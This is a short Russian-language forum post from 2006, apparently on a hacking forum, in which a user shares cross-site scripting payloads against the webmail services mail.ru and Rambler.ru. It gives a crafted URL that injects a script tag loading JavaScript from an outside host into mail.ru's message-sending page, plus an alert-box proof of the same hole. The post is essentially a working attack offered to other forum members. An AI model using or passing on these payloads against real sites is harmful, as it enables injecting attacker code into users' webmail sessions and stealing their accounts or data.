
09.10.2006, 03:01
|
|
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме: 328074
Репутация:
74
|
|
выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>
Последний раз редактировалось Actu@l SpY; 09.10.2006 в 04:34..
|
|
|